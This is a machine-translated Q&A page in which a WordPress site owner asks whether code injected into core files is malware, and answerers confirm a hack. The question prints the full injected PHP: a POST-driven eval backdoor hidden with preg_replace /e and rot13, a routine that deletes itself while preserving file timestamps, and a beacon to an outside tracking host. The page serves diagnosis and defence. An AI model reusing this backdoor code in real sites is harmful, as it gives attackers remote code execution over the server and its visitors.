Php 这是wordpress病毒吗?
我刚刚注意到我的一些wordpress项目在特定位置包含一些随机代码 例如: wp includes/meta.php包含在下面文件代码的底部:Php 这是wordpress病毒吗?,php,wordpress,frameworks,eval,Php,Wordpress,Frameworks,Eval,我刚刚注意到我的一些wordpress项目在特定位置包含一些随机代码 例如: wp includes/meta.php包含在下面文件代码的底部: check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732115){ $jp_c = file_get_contents($jp); if($t =
check_meta();
function check_meta(){
$jp = __FILE__;
$jptime = filemtime($jp);
if(time() >= 1456732115){
$jp_c = file_get_contents($jp);
if($t = @strpos($jp_c,"check_meta();")) {
$contentp = substr($jp_c,0,$t);
if(@file_put_contents($jp, $contentp)){
@touch($jp,$jptime);
}
}
}
@file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/ID3/getid.php");
}
<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['ttr6i']) && ($www= $_POST['ttr6i']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>
另一个位置:wp包含/ID3/getid.php包含以下代码:
check_meta();
function check_meta(){
$jp = __FILE__;
$jptime = filemtime($jp);
if(time() >= 1456732115){
$jp_c = file_get_contents($jp);
if($t = @strpos($jp_c,"check_meta();")) {
$contentp = substr($jp_c,0,$t);
if(@file_put_contents($jp, $contentp)){
@touch($jp,$jptime);
}
}
}
@file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/ID3/getid.php");
}
<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['ttr6i']) && ($www= $_POST['ttr6i']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>
基本上,我看到的是,check_meta()方法正在更新wp includes/meta.php文件,而不更改其修改时间。然后,文件\u get\u contents与某个中文服务器连接,并通过$\u get传递一些数据
在第二个文件中,str_rot13('riny')等于eval
以前有人处理过这种问题吗?也许有人可以说更多关于这个代码。期待您的来信。现在我把它当作病毒一样对待,因为它已经传播到我的许多项目中。千万不要相信你没有包含的不熟悉的代码!骗子经常试图让恶意软件看起来无害,如上所述。尝试安装WordFence、Sucuri或其他安全插件并运行扫描。看起来您的服务器已被黑客攻击。我过去曾一两次处理过类似问题。是的,黑客似乎是专门针对WordPress网站的 无论如何都不应该修改WordPress核心
我访问了
http://web.51.la:82
并打印出我的所有信息:ip地址、浏览器等。它可能是一个跟踪访问和其他东西的跟踪类型插件,我不知道为什么有人会想收集关于你的访问者的信息。我认为如果你在WordPress开发堆栈交换中发布,你可能会得到更好的响应